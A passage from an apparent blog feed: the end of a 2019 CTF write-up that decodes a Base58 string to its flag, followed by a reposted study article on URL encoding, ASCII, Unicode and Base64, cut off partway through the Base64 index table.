Base58 principle above, the algorithm here is Base58 encoding.</p><p>Decode the string D9cS9N9iHjMLTdA8YSMRMp.</p><p>This gives flag{base58_is_boring}.</p>]]></content>
<summary type="html">
<p>2019 Xihu Lunjian (West Lake Sword Debate) qualifier</p>
</summary>
<category term="CTF" scheme="https://github.com/gha01un/gha01un.github.io/categories/CTF/"/>
<category term="RE" scheme="https://github.com/gha01un/gha01un.github.io/tags/RE/"/>
</entry>
<entry>
<title>Cybersecurity homework: common encodings</title>
<link href="https://github.com/gha01un/gha01un.github.io/2020/12/13/URL%E7%BC%96%E7%A0%81/"/>
<id>https://github.com/gha01un/gha01un.github.io/2020/12/13/URL%E7%BC%96%E7%A0%81/</id>
<published>2020-12-13T11:34:15.791Z</published>
<updated>2020-12-17T08:14:45.149Z</updated>
<content type="html"><![CDATA[<p>Reposted from Haili, a master of the craft!</p><a id="more"></a><h3 id="URL编码"><a href="#URL编码" class="headerlink" title="URL encoding"></a>URL encoding</h3><p>The characters allowed in a URI are divided into <strong>reserved</strong> and <strong>unreserved</strong>. <strong>Reserved</strong> characters are those with special meaning; for example, the <a href="https://zh.wikipedia.org/wiki/斜線" target="_blank" rel="noopener">slash</a> character separates the different parts of a URL (or URI). <strong>Unreserved</strong> characters have no such special meaning. Percent-encoding represents reserved characters as special character sequences. The details vary slightly between URIs and between versions of the URI specification.</p><h4 id="对保留字符的百分号编码"><a href="#对保留字符的百分号编码" class="headerlink" title="Percent-encoding reserved characters"></a>Percent-encoding reserved characters</h4><p>First write the character's ASCII value as two hexadecimal digits, then prefix it with the <a href="https://zh.wikipedia.org/wiki/转义字符" target="_blank" rel="noopener">escape character</a> ("<code>%</code>") and place the result at the corresponding position in the URI.</p><h4 id="对未保留字符的百分号编码"><a href="#对未保留字符的百分号编码" class="headerlink" title="Percent-encoding unreserved characters"></a>Percent-encoding unreserved characters</h4><p>Unreserved characters do not need percent-encoding.</p><h4 id="对百分号字符的百分号编码"><a href="#对百分号字符的百分号编码" class="headerlink" title="Percent-encoding the percent character"></a>Percent-encoding the percent character</h4><p>Because the percent character ("%") signals the presence of percent-encoded bytes, a literal percent character inside a URI must itself be encoded as the three-byte sequence "%25" (0x25 is the ASCII code of %).</p><p>The encoding table can simply follow the ASCII table (see below).</p><p><a href="https://zh.wikipedia.org/wiki/百分号编码" target="_blank" rel="noopener">URL encoding (Wikipedia)</a></p><h2 id="ASCII编码"><a href="#ASCII编码" class="headerlink" title="ASCII encoding"></a>ASCII encoding</h2><p>ASCII developed from telegraph codes and, after several revisions, now defines 128 characters in total; 33 of them are non-printable (some terminals provide extensions that render them as 8-bit symbols such as smileys and playing-card suits), and most of these 33 are now obsolete <a href="https://zh.wikipedia.org/wiki/控制字元" target="_blank" rel="noopener">control characters</a>. Control characters are mainly used to manipulate text that has already been processed.<br>ASCII can be simply divided into control characters and printable characters.</p><p>In decimal, 0~31 and 127 are control characters and 32~126 are printable characters; among them, 48~57 are the ten Arabic digits 0 to 9, 65~90 are the 26 uppercase English letters, 97~122 are the 26 lowercase English letters, and the rest are punctuation, operators and other symbols.</p><p><a href="https://zh.wikipedia.org/wiki/ASCII" target="_blank" rel="noopener">ASCII (Wikipedia)</a></p><h2 id="Unicode码"><a href="#Unicode码" class="headerlink" title="Unicode"></a>Unicode</h2><p><a href="https://baike.baidu.com/item/Unicode" target="_blank" rel="noopener">Unicode</a> is an encoding scheme created to overcome the limitations of traditional character encoding schemes. It assigns a unified and unique <a href="https://baike.baidu.com/item/二进制" target="_blank" rel="noopener">binary</a> code to every character in every language, so that text can be converted and processed across languages and platforms. Unicode has three concrete encoding forms, utf-8, utf-16 and utf-32: utf-8 uses one to four bytes per character, utf-16 two or four bytes, and utf-32 four bytes.</p><p>Unicode extends the ASCII <a href="https://baike.baidu.com/item/字元集" target="_blank" rel="noopener">character set</a>. Unicode uses a full 16-bit character set, which lets it represent the characters, ideographs and other symbols of all the world's written languages that might be used in computer communication.</p><p>Unicode was originally intended as a supplement to ASCII and, where possible, eventually to replace it.</p><p>Unicode is continually being revised and extended; the scripts and symbol sets it now includes are: <a href="https://zh.wikipedia.org/wiki/阿拉伯字母" target="_blank" rel="noopener">Arabic</a>, <a href="https://zh.wikipedia.org/wiki/亞美尼亞字母" target="_blank" rel="noopener">Armenian</a>, <a href="https://zh.wikipedia.org/wiki/孟加拉文" target="_blank" rel="noopener">Bengali</a>, <a href="https://zh.wikipedia.org/wiki/注音符號" target="_blank" rel="noopener">Bopomofo</a>, <a href="https://zh.wikipedia.org/wiki/西里爾字母" target="_blank" rel="noopener">Cyrillic</a>, <a href="https://zh.wikipedia.org/wiki/天城文" target="_blank" rel="noopener">Devanagari</a>, <a href="https://zh.wikipedia.org/wiki/格鲁吉亚字母" target="_blank" rel="noopener">Georgian</a>, <a href="https://zh.wikipedia.org/wiki/希臘字母" target="_blank" rel="noopener">Greek</a>, <a href="https://zh.wikipedia.org/wiki/古吉拉特文" target="_blank" rel="noopener">Gujarati</a>, <a href="https://zh.wikipedia.org/wiki/古木基文" target="_blank" rel="noopener">Gurmukhi</a>, <a href="https://zh.wikipedia.org/wiki/諺文" target="_blank" rel="noopener">Hangul</a>, <a href="https://zh.wikipedia.org/wiki/希伯來字母" target="_blank" rel="noopener">Hebrew</a>, <a href="https://zh.wikipedia.org/wiki/平假名" target="_blank" rel="noopener">Hiragana</a>, <a href="https://zh.wikipedia.org/wiki/卡納達文" target="_blank" rel="noopener">Kannada</a>, <a href="https://zh.wikipedia.org/wiki/片假名" target="_blank" rel="noopener">Katakana</a>, <a href="https://zh.wikipedia.org/wiki/寮文字" target="_blank" rel="noopener">Lao</a>, <a href="https://zh.wikipedia.org/wiki/拉丁字母" target="_blank" rel="noopener">Latin</a>, <a href="https://zh.wikipedia.org/wiki/馬拉雅拉姆文" target="_blank" rel="noopener">Malayalam</a>, <a href="https://zh.wikipedia.org/wiki/奧里亞文" target="_blank" rel="noopener">Oriya</a>, <a href="https://zh.wikipedia.org/wiki/泰米爾文" target="_blank" rel="noopener">Tamil</a>, <a href="https://zh.wikipedia.org/wiki/泰卢固文" target="_blank" rel="noopener">Telugu</a>, <a href="https://zh.wikipedia.org/wiki/泰文字" target="_blank" rel="noopener">Thai</a>, the <a href="https://zh.wikipedia.org/wiki/歐元符號" target="_blank" rel="noopener">euro sign</a>, the object replacement character, <a href="https://zh.wikipedia.org/wiki/切罗基文" target="_blank" rel="noopener">Cherokee</a>, <a href="https://zh.wikipedia.org/wiki/吉茲字母" target="_blank" rel="noopener">Ge'ez</a>, <a href="https://zh.wikipedia.org/wiki/高棉字母" target="_blank" rel="noopener">Khmer</a>, <a href="https://zh.wikipedia.org/wiki/蒙古字母" target="_blank" rel="noopener">Mongolian</a>, <a href="https://zh.wikipedia.org/wiki/缅文" target="_blank" rel="noopener">Burmese</a>, <a href="https://zh.wikipedia.org/wiki/歐甘字母" target="_blank" rel="noopener">Ogham</a>, <a href="https://zh.wikipedia.org/wiki/卢恩字母" target="_blank" rel="noopener">Runic</a>, <a href="https://zh.wikipedia.org/wiki/僧伽羅文" target="_blank" rel="noopener">Sinhala</a>, <a href="https://zh.wikipedia.org/wiki/敘利亞字母" target="_blank" rel="noopener">Syriac</a>, <a href="https://zh.wikipedia.org/wiki/它拿字母" target="_blank" rel="noopener">Thaana</a>, <a href="https://zh.wikipedia.org/wiki/加拿大原住民音節文字" target="_blank" rel="noopener">Canadian Aboriginal syllabics</a>, <a href="https://zh.wikipedia.org/wiki/彝文" target="_blank" rel="noopener">Yi</a><br>, some Braille patterns, <a href="https://zh.wikipedia.org/w/index.php?title=德瑟雷特字母&action=edit&redlink=1" target="_blank" rel="noopener">Deseret</a>, <a href="https://zh.wikipedia.org/wiki/哥特字母" target="_blank" rel="noopener">Gothic</a>, <a href="https://zh.wikipedia.org/wiki/古意大利字母" target="_blank" rel="noopener">Old Italic</a>, <a href="https://zh.wikipedia.org/wiki/音樂符號" target="_blank" rel="noopener">musical symbols</a>, <a href="https://zh.wikipedia.org/wiki/拜占庭音乐符号" target="_blank" rel="noopener">Byzantine musical symbols</a>, <a href="https://zh.wikipedia.org/wiki/中日韩统一表意文字" target="_blank" rel="noopener">CJK Unified Ideographs</a>, the <a href="https://zh.wikipedia.org/wiki/菲律宾" target="_blank" rel="noopener">Philippine</a> scripts <a href="https://zh.wikipedia.org/wiki/布锡文" target="_blank" rel="noopener">Buhid</a>, <a href="https://zh.wikipedia.org/w/index.php?title=哈努诺文&action=edit&redlink=1" target="_blank" rel="noopener">Hanunoo</a>, <a href="https://zh.wikipedia.org/wiki/他加祿文" target="_blank" rel="noopener">Tagalog</a> and <a href="https://zh.wikipedia.org/w/index.php?title=塔格巴奴亚文&action=edit&redlink=1" target="_blank" rel="noopener">Tagbanwa</a>, the <a href="https://zh.wikipedia.org/wiki/塞浦路斯音节文字" target="_blank" rel="noopener">Cypriot syllabary</a>, <a href="https://zh.wikipedia.org/w/index.php?title=林布字母&action=edit&redlink=1" target="_blank" rel="noopener">Limbu</a>, <a href="https://zh.wikipedia.org/wiki/线形文字B" target="_blank" rel="noopener">Linear B</a>, <a href="https://zh.wikipedia.org/wiki/奧斯曼亞字母" target="_blank" rel="noopener">Osmanya</a>, <a href="https://zh.wikipedia.org/wiki/蕭伯納字母" target="_blank" rel="noopener">Shavian</a>, <a href="https://zh.wikipedia.org/wiki/德宏傣文" target="_blank" rel="noopener">Tai Le</a>, <a href="https://zh.wikipedia.org/wiki/乌加里特字母" target="_blank" rel="noopener">Ugaritic</a>, the <a href="https://zh.wikipedia.org/wiki/六十四卦" target="_blank" rel="noopener">64 hexagrams</a>, <a href="https://zh.wikipedia.org/w/index.php?title=布吉文&action=edit&redlink=1" target="_blank" rel="noopener">Buginese</a>, <a href="https://zh.wikipedia.org/wiki/格拉哥里字母" target="_blank" rel="noopener">Glagolitic</a>, <a href="https://zh.wikipedia.org/wiki/佉卢文" target="_blank" rel="noopener">Kharoshthi</a>, <a href="https://zh.wikipedia.org/wiki/西双版纳傣文" target="_blank" rel="noopener">New Tai Lue</a>, <a href="https://zh.wikipedia.org/w/index.php?title=古波斯文&action=edit&redlink=1" target="_blank" rel="noopener">Old Persian</a>, <a href="https://zh.wikipedia.org/w/index.php?title=锡尔赫特文&action=edit&redlink=1" target="_blank" rel="noopener">Syloti Nagri</a>, <a href="https://zh.wikipedia.org/wiki/提非納文" target="_blank" rel="noopener">Tifinagh</a>, <a href="https://zh.wikipedia.org/w/index.php?title=古希腊音乐符号&action=edit&redlink=1" target="_blank" rel="noopener">Ancient Greek musical notation</a>, <a href="https://zh.wikipedia.org/wiki/巴厘文" target="_blank" rel="noopener">Balinese</a>, <a href="https://zh.wikipedia.org/wiki/楔形文字" target="_blank" rel="noopener">Cuneiform</a>, <a href="https://zh.wikipedia.org/wiki/西非书面文字" target="_blank" rel="noopener">N'Ko</a>, <a href="https://zh.wikipedia.org/wiki/八思巴文" target="_blank" rel="noopener">Phags-pa</a>, <a href="https://zh.wikipedia.org/wiki/腓尼基字母" target="_blank" rel="noopener">Phoenician</a>, <a href="https://zh.wikipedia.org/w/index.php?title=卡利亚文&action=edit&redlink=1" target="_blank" rel="noopener">Carian</a>, <a href="https://zh.wikipedia.org/wiki/占婆字母" target="_blank" rel="noopener">Cham</a>, <a href="https://zh.wikipedia.org/w/index.php?title=克耶黎文&action=edit&redlink=1" target="_blank" rel="noopener">Kayah Li</a>, <a href="https://zh.wikipedia.org/wiki/绒巴文" target="_blank" rel="noopener">Lepcha</a>, <a href="https://zh.wikipedia.org/w/index.php?title=利西亚文&action=edit&redlink=1" target="_blank" rel="noopener">Lycian</a>, <a href="https://zh.wikipedia.org/w/index.php?title=吕底亚文&action=edit&redlink=1" target="_blank" rel="noopener">Lydian</a>, <a href="https://zh.wikipedia.org/w/index.php?title=桑塔利文&action=edit&redlink=1" target="_blank" rel="noopener">Ol Chiki</a>, <a href="https://zh.wikipedia.org/w/index.php?title=拉让文&action=edit&redlink=1" target="_blank" rel="noopener">Rejang</a>, <a href="https://zh.wikipedia.org/w/index.php?title=索拉什特拉文&action=edit&redlink=1" target="_blank" rel="noopener">Saurashtra</a>, <a href="https://zh.wikipedia.org/w/index.php?title=巽他文&action=edit&redlink=1" target="_blank" rel="noopener">Sundanese</a>, <a href="https://zh.wikipedia.org/w/index.php?title=瓦伊文&action=edit&redlink=1" target="_blank" rel="noopener">Vai</a>, the <a href="https://zh.wikipedia.org/wiki/斐斯托斯圓盤" target="_blank" rel="noopener">Phaistos Disc</a>, <a href="https://zh.wikipedia.org/wiki/麻将" target="_blank" rel="noopener">Mahjong</a> and <a href="https://zh.wikipedia.org/wiki/多米诺骨牌" target="_blank" rel="noopener">domino</a> tile symbols, <a href="https://zh.wikipedia.org/w/index.php?title=阿维斯陀文&action=edit&redlink=1" target="_blank" rel="noopener">Avestan</a>, <a href="https://zh.wikipedia.org/wiki/巴姆穆文字" target="_blank" rel="noopener">Bamum</a>, <a href="https://zh.wikipedia.org/wiki/埃及象形文字" target="_blank" rel="noopener">Egyptian hieroglyphs</a> (<a href="https://zh.wikipedia.org/wiki/加汀納符號表" target="_blank" rel="noopener">Gardiner's sign list</a>, covering 1071 signs), <a href="https://zh.wikipedia.org/wiki/亞拉姆文" target="_blank" rel="noopener">Aramaic</a>, <a href="https://zh.wikipedia.org/w/index.php?title=巴拉维碑铭体&action=edit&redlink=1" target="_blank" rel="noopener">Inscriptional Pahlavi</a>, <a href="https://zh.wikipedia.org/w/index.php?title=帕提亚碑铭体&action=edit&redlink=1" target="_blank" rel="noopener">Inscriptional Parthian</a>, <a href="https://zh.wikipedia.org/wiki/爪哇文" target="_blank" rel="noopener">Javanese</a>, <a href="https://zh.wikipedia.org/wiki/凱提文" target="_blank" rel="noopener">Kaithi</a>, <a href="https://zh.wikipedia.org/wiki/老傈僳文" target="_blank" rel="noopener">Lisu</a>, <a href="https://zh.wikipedia.org/w/index.php?title=曼尼普尔文&action=edit&redlink=1" target="_blank" rel="noopener">Meetei Mayek</a>, <a href="https://zh.wikipedia.org/wiki/南阿拉伯字母" target="_blank" rel="noopener">Old South Arabian</a>, <a href="https://zh.wikipedia.org/wiki/古突厥文" target="_blank" rel="noopener">Old Turkic</a>, <a href="https://zh.wikipedia.org/w/index.php?title=撒玛利亚字母&action=edit&redlink=1" target="_blank" rel="noopener">Samaritan</a>, <a href="https://zh.wikipedia.org/wiki/老傣文" target="_blank" rel="noopener">Tai Tham</a>, <a href="https://zh.wikipedia.org/wiki/傣黯語" target="_blank" rel="noopener">Tai Viet</a>, <a href="https://zh.wikipedia.org/w/index.php?title=巴塔克字母&action=edit&redlink=1" target="_blank" rel="noopener">Batak</a>, <a href="https://zh.wikipedia.org/wiki/婆罗米文字" target="_blank" rel="noopener">Brahmi</a>, <a href="https://zh.wikipedia.org/w/index.php?title=曼达字母&action=edit&redlink=1" target="_blank" rel="noopener">Mandaic</a>, <a href="https://zh.wikipedia.org/wiki/纸牌" target="_blank" rel="noopener">playing card</a> symbols, <a href="https://zh.wikipedia.org/wiki/交通标志" target="_blank" rel="noopener">traffic signs</a>, <a href="https://zh.wikipedia.org/wiki/地图" target="_blank" rel="noopener">map</a> symbols, <a href="https://zh.wikipedia.org/w/index.php?title=炼金术符号&action=edit&redlink=1" target="_blank" rel="noopener">alchemical symbols</a>, <a href="https://zh.wikipedia.org/wiki/颜文字" target="_blank" rel="noopener">emoticons</a>, <a href="https://zh.wikipedia.org/wiki/绘文字" target="_blank" rel="noopener">emoji</a>, <a href="https://zh.wikipedia.org/w/index.php?title=查克马字母&action=edit&redlink=1" target="_blank" rel="noopener">Chakma</a>, <a href="https://zh.wikipedia.org/wiki/麦罗埃文" target="_blank" rel="noopener">Meroitic cursive</a>, <a href="https://zh.wikipedia.org/w/index.php?title=麦罗埃象形文字&action=edit&redlink=1" target="_blank" rel="noopener">Meroitic hieroglyphs</a>, <a href="https://zh.wikipedia.org/wiki/柏格理苗文" target="_blank" rel="noopener">Pollard Miao</a>, <a href="https://zh.wikipedia.org/wiki/夏拉達文" target="_blank" rel="noopener">Sharada</a>, <a href="https://zh.wikipedia.org/wiki/索拉僧平文字" target="_blank" rel="noopener">Sora Sompeng</a>, <a href="https://zh.wikipedia.org/w/index.php?title=泰克里文&action=edit&redlink=1" target="_blank" rel="noopener">Takri</a>, the <a href="https://zh.wikipedia.org/wiki/土耳其里拉符号" target="_blank" rel="noopener">Turkish lira sign</a>, five bidirectional formatting characters, <a href="https://zh.wikipedia.org/w/index.php?title=巴萨字母&action=edit&redlink=1" target="_blank" rel="noopener">Bassa Vah</a>, <a href="https://zh.wikipedia.org/w/index.php?title=高加索阿尔巴尼亚字母&action=edit&redlink=1" target="_blank" rel="noopener">Caucasian Albanian</a>, <a href="https://zh.wikipedia.org/w/index.php?title=杜普雷嚴速記&action=edit&redlink=1" target="_blank" rel="noopener">Duployan shorthand</a>, <a href="https://zh.wikipedia.org/w/index.php?title=爱尔巴桑字母&action=edit&redlink=1" target="_blank" rel="noopener">Elbasan</a>, <a href="https://zh.wikipedia.org/wiki/古兰塔文" target="_blank" rel="noopener">Grantha</a>, <a 
href="https://zh.wikipedia.org/w/index.php?title=可吉文&action=edit&redlink=1" target="_blank" rel="noopener">可吉文</a>,<a href="https://zh.wikipedia.org/w/index.php?title=库达瓦迪文&action=edit&redlink=1" target="_blank" rel="noopener">库达瓦迪文</a>,<a href="https://zh.wikipedia.org/wiki/线形文字A" target="_blank" rel="noopener">线形文字A</a>,<a href="https://zh.wikipedia.org/w/index.php?title=马哈佳尼文&action=edit&redlink=1" target="_blank" rel="noopener">马哈佳尼文</a>,<a href="https://zh.wikipedia.org/wiki/摩尼教字母" target="_blank" rel="noopener">摩尼教字母</a>,<a href="https://zh.wikipedia.org/w/index.php?title=门得文字&action=edit&redlink=1" target="_blank" rel="noopener">门得文字</a>,<a href="https://zh.wikipedia.org/w/index.php?title=莫迪字母&action=edit&redlink=1" target="_blank" rel="noopener">莫迪字母</a>,<a href="https://zh.wikipedia.org/w/index.php?title=默文&action=edit&redlink=1" target="_blank" rel="noopener">默文</a>,<a href="https://zh.wikipedia.org/wiki/納巴泰字母" target="_blank" rel="noopener">纳巴泰字母</a>,<a href="https://zh.wikipedia.org/w/index.php?title=古北阿拉伯文&action=edit&redlink=1" target="_blank" rel="noopener">古北阿拉伯文</a>,<a href="https://zh.wikipedia.org/wiki/古彼爾姆文" target="_blank" rel="noopener">古彼尔姆文</a>,<a href="https://zh.wikipedia.org/wiki/杨松录苗文" target="_blank" rel="noopener">杨松录苗文</a>,<a href="https://zh.wikipedia.org/w/index.php?title=帕米拉文字&action=edit&redlink=1" target="_blank" rel="noopener">帕米拉文字</a>,<a href="https://zh.wikipedia.org/w/index.php?title=袍清豪文&action=edit&redlink=1" target="_blank" rel="noopener">袍清豪文</a>,<a href="https://zh.wikipedia.org/w/index.php?title=诗篇巴列维文&action=edit&redlink=1" target="_blank" rel="noopener">诗篇巴列维文</a>,<a href="https://zh.wikipedia.org/wiki/悉曇文字" target="_blank" rel="noopener">悉昙文字</a>,<a href="https://zh.wikipedia.org/wiki/底罗仆多文" target="_blank" rel="noopener">底罗仆多文</a>,<a href="https://zh.wikipedia.org/w/index.php?title=瓦兰齐地文&action=edit&redlink=1" target="_blank" rel="noopener">瓦兰齐地文</a>、<a href="https://zh.wikipedia.org/wiki/Dingbat" target="_blank" 
rel="noopener">装饰符号</a>、<a href="https://zh.wikipedia.org/wiki/阿洪姆文" target="_blank" rel="noopener">阿洪姆文</a>,<a href="https://zh.wikipedia.org/w/index.php?title=安纳托利亚象形文字&action=edit&redlink=1" target="_blank" rel="noopener">安纳托利亚象形文字</a>,<a href="https://zh.wikipedia.org/w/index.php?title=哈坦文&action=edit&redlink=1" target="_blank" rel="noopener">哈坦文</a>,<a href="https://zh.wikipedia.org/w/index.php?title=穆尔塔尼文&action=edit&redlink=1" target="_blank" rel="noopener">穆尔塔尼文</a>,<a href="https://zh.wikipedia.org/wiki/古匈牙利字母" target="_blank" rel="noopener">古匈牙利字母</a>,<a href="https://zh.wikipedia.org/w/index.php?title=书写符号&action=edit&redlink=1" target="_blank" rel="noopener">书写符号</a>、<a href="https://zh.wikipedia.org/wiki/切罗基文" target="_blank" rel="noopener">切罗基文</a>小写字母,以及五种<a href="https://zh.wikipedia.org/wiki/绘文字" target="_blank" rel="noopener">绘文字</a><a href="https://zh.wikipedia.org/wiki/膚色" target="_blank" rel="noopener">肤色</a>修改字符、<a href="https://zh.wikipedia.org/w/index.php?title=阿德拉姆字母&action=edit&redlink=1" target="_blank" rel="noopener">阿德拉姆字母</a>,<a href="https://zh.wikipedia.org/w/index.php?title=比奇舒奇文&action=edit&redlink=1" target="_blank" rel="noopener">比奇舒奇文</a>,<a href="https://zh.wikipedia.org/wiki/象雄文" target="_blank" rel="noopener">象雄文</a>,<a href="https://zh.wikipedia.org/w/index.php?title=尼泊尔纽瓦字母&action=edit&redlink=1" target="_blank" rel="noopener">尼泊尔纽瓦字母</a>,<a href="https://zh.wikipedia.org/w/index.php?title=欧塞奇字母&action=edit&redlink=1" target="_blank" rel="noopener">欧塞奇字母</a>,<a href="https://zh.wikipedia.org/wiki/西夏文" target="_blank" rel="noopener">西夏文</a>、绘字文、<a href="https://zh.wikipedia.org/wiki/蒙古文字" target="_blank" rel="noopener">札那巴札尔</a>、<a href="https://zh.wikipedia.org/wiki/索永布文字" target="_blank" rel="noopener">索永布文字</a>、<a href="https://zh.wikipedia.org/w/index.php?title=马萨拉姆贡德文字&action=edit&redlink=1" target="_blank" rel="noopener">马萨拉姆贡德文字</a>、<a href="https://zh.wikipedia.org/wiki/女书" target="_blank" rel="noopener">女书</a>、<a 
href="https://zh.wikipedia.org/wiki/變體假名" target="_blank" rel="noopener">变体假名</a>(非标准<a href="https://zh.wikipedia.org/wiki/平假名" target="_blank" rel="noopener">平假名</a>)、<a href="https://zh.wikipedia.org/w/index.php?title=多格拉文&action=edit&redlink=1" target="_blank" rel="noopener">多格拉文</a>、<a href="https://zh.wikipedia.org/wiki/喬治亞文" target="_blank" rel="noopener">格鲁吉亚文</a>骑士体大写字母、<a href="https://zh.wikipedia.org/w/index.php?title=贡贾拉贡德文&action=edit&redlink=1" target="_blank" rel="noopener">贡贾拉贡德文</a>、<a href="https://zh.wikipedia.org/wiki/哈乃斐羅興亞文字" target="_blank" rel="noopener">哈乃斐罗兴亚文字</a>、<a href="https://zh.wikipedia.org/w/index.php?title=望加锡文&action=edit&redlink=1" target="_blank" rel="noopener">望加锡文</a>、<a href="https://zh.wikipedia.org/w/index.php?title=梅德法伊德林文&action=edit&redlink=1" target="_blank" rel="noopener">梅德法伊德林文</a>、<a href="https://zh.wikipedia.org/wiki/老粟特文" target="_blank" rel="noopener">老粟特文</a>、<a href="https://zh.wikipedia.org/wiki/粟特文" target="_blank" rel="noopener">粟特文</a>、<a href="https://zh.wikipedia.org/wiki/埃利邁文" target="_blank" rel="noopener">埃利迈文</a>、<a href="https://zh.wikipedia.org/w/index.php?title=南迪城文&action=edit&redlink=1" target="_blank" rel="noopener">南迪城文</a>、<a href="https://zh.wikipedia.org/wiki/創世紀苗文" target="_blank" rel="noopener">创世纪苗文</a>、<a href="https://zh.wikipedia.org/w/index.php?title=文乔文&action=edit&redlink=1" target="_blank" rel="noopener">文乔文</a>、<a href="https://zh.wikipedia.org/wiki/花剌子模语" target="_blank" rel="noopener">花剌子模语</a>、<a href="https://zh.wikipedia.org/wiki/迪维西语" target="_blank" rel="noopener">迪维西语</a>的<a href="https://zh.wikipedia.org/w/index.php?title=島字母&action=edit&redlink=1" target="_blank" rel="noopener">岛字母</a>、<a href="https://zh.wikipedia.org/wiki/契丹小字" target="_blank" rel="noopener">契丹小字</a>、<a href="https://zh.wikipedia.org/wiki/库尔德语字母" target="_blank" rel="noopener">库尔德语字母</a>的<a href="https://zh.wikipedia.org/wiki/库尔德语字母" target="_blank" rel="noopener">Yezidi体</a>、书写<a 
href="https://zh.wikipedia.org/wiki/豪萨语" target="_blank" rel="noopener">Hausa</a>, <a href="https://zh.wikipedia.org/wiki/沃洛夫語" target="_blank" rel="noopener">Wolof</a> and other African languages, supplementary characters for writing <a href="https://zh.wikipedia.org/w/index.php?title=印德科語&action=edit&redlink=1" target="_blank" rel="noopener">Hindko</a> and <a href="https://zh.wikipedia.org/wiki/旁遮普語" target="_blank" rel="noopener">Punjabi</a> in Pakistan, <a href="https://zh.wikipedia.org/wiki/粵語注音符號" target="_blank" rel="noopener">Bopomofo</a> letters for <a href="https://zh.wikipedia.org/wiki/粵語" target="_blank" rel="noopener">Cantonese</a>, <a href="https://zh.wikipedia.org/wiki/共享創意" target="_blank" rel="noopener">Creative Commons</a> license symbols, and telecommunications pictographs from the 1970s and 1980s.</p><h3 id="Unicode编码系统可分为编码方式和实现方式两个层次。"><a href="#Unicode编码系统可分为编码方式和实现方式两个层次。" class="headerlink" title="Unicode编码系统可分为编码方式和实现方式两个层次。"></a>The Unicode encoding system has two layers: the encoding scheme and its implementation.</h3><p>The Unicode version in practical use today corresponds to <a href="https://zh.wikipedia.org/wiki/UCS-2" target="_blank" rel="noopener">UCS-2</a>, which uses a 16-<a href="https://zh.wikipedia.org/wiki/位元" target="_blank" rel="noopener">bit</a> code space, so each character occupies 2 <a href="https://zh.wikipedia.org/wiki/字节" target="_blank" rel="noopener">bytes</a>. In theory this can represent at most 2<sup>16</sup> (65,536) characters, which basically covers the needs of every language.<br>UCS-4 is a larger, not yet fully populated 31-bit character set; with a leading bit that is always 0 it occupies 32 bits, i.e. 4 bytes, and can in theory represent up to 2<sup>31</sup> characters, enough to cover the symbols of every language.<br>Characters in the Basic Multilingual Plane are encoded as <em>U+hhhh</em>, where each <em>h</em> is a <a href="https://zh.wikipedia.org/wiki/十六进制" target="_blank" rel="noopener">hexadecimal</a> digit; this is identical to the UCS-2 encoding. The corresponding 4-byte UCS-4 encoding has the same last two bytes, while the first two bytes are all zero.<br>Unicode's implementation is distinct from its encoding. A character's Unicode code point is fixed, but in actual transmission, because different <a href="https://zh.wikipedia.org/wiki/系统平台" target="_blank" rel="noopener">system platforms</a> are not necessarily designed alike, and to save space, the code point is implemented in different ways. These implementations are called <strong>Unicode Transformation Formats</strong> (UTF).</p><p><a href="https://zh.wikipedia.org/wiki/Unicode" target="_blank" rel="noopener">Unicode on Wikipedia</a></p><h2 id="base64"><a href="#base64" class="headerlink" title="base64"></a>base64</h2><p><strong>Base64</strong> is a way of representing <a href="https://zh.wikipedia.org/wiki/二进制" target="_blank" rel="noopener">binary data</a> with 64 printable characters. Every 6 <a href="https://zh.wikipedia.org/wiki/位元" target="_blank" rel="noopener">bits</a> form one unit. Base64 is commonly used to represent, transmit and store binary data in contexts that normally handle text <a href="https://zh.wikipedia.org/wiki/数据" target="_blank" rel="noopener">data</a>, including <a href="https://zh.wikipedia.org/wiki/MIME" target="_blank" rel="noopener">MIME</a> <a href="https://zh.wikipedia.org/wiki/电子邮件" target="_blank" rel="noopener">e-mail</a> and some complex data in <a href="https://zh.wikipedia.org/wiki/XML" target="_blank" rel="noopener">XML</a>.</p><ul><li>Encoding "Man"</li></ul><table><thead><tr><th align="center">Text</th><th align="center" colspan="8">M</th><th align="center" colspan="8">a</th><th align="center" colspan="8">n</th></tr></thead><tbody><tr><td align="center">ASCII</td><td align="center" colspan="8">77</td><td align="center" colspan="8">97</td><td align="center" colspan="8">110</td></tr><tr><td align="center">Bits</td><td>0</td><td>1</td><td>0</td><td>0</td><td>1</td><td>1</td><td>0</td><td>1</td><td>0</td><td>1</td><td>1</td><td>0</td><td>0</td><td>0</td><td>0</td><td>1</td><td>0</td><td>1</td><td>1</td><td>0</td><td>1</td><td>1</td><td>1</td><td>0</td></tr><tr><td align="center">Index</td><td align="center" colspan="6">19</td><td align="center" colspan="6">22</td><td align="center" colspan="6">5</td><td align="center" colspan="6">46</td></tr><tr><td align="center">Base64</td><td align="center" colspan="6"><strong>T</strong></td><td align="center" colspan="6">W</td><td align="center" colspan="6">F</td><td align="center" colspan="6">u</td></tr></tbody></table><p>In this example the Base64 algorithm encodes 3 bytes as 4 characters.</p><p>Base64 index table:</p><table><thead><tr><th align="center">Value</th><th align="center">Char</th><th align="center">Value</th><th align="center">Char</th><th align="center">Value</th><th align="center">Char</th><th align="center">Value</th><th align="center">Char</th></tr></thead><tbody><tr><td align="center">0</td><td align="center">A</td><td align="center">16</td><td align="center">Q</td><td align="center">32</td><td align="center">g</td><td align="center">48</td><td align="center">w</td></tr><tr><td align="center">1</td><td align="center">B</td><td align="center">17</td><td align="center">R</td><td align="center">33</td><td align="center">h</td><td align="center">49</td><td align="center">x</td></tr><tr><td align="center">2</td><td align="center">C</td><td align="center">18</td><td align="center">S</td><td align="center">34</td><td align="center">i</td><td align="center">50</td><td align="center">y</td></tr><tr><td align="center">3</td><td align="center">D</td><td align="center">19</td><td align="center">T</td><td align="center">35</td><td align="center">j</td><td align="center">51</td><td align="center">z</td></tr><tr><td align="center">4</td><td align="center">E</td><td align="center">20</td><td align="center">U</td><td align="center">36</td><td align="center">k</td><td align="center">52</td><td align="center">0</td></tr><tr><td align="center">5</td><td align="center">F</td><td align="center">21</td><td align="center">V</td><td align="center">37</td><td align="center">l</td><td align="center">53</td><td align="center">1</td></tr><tr><td align="center">6</td><td align="center">G</td><td align="center">22</td><td align="center">W</td><td align="center">38</td><td align="center">m</td><td align="center">54</td><td align="center">2</td></tr><tr><td align="center">7</td><td align="center">H</td><td align="center">23</td><td align="center">X</td><td align="center">39</td><td align="center">n</td><td align="center">55</td><td align="center">3</td></tr><tr><td align="center">8</td><td align="center">I</td><td align="center">24</td><td align="center">Y</td><td align="center">40</td><td align="center">o</td><td align="center">56</td><td 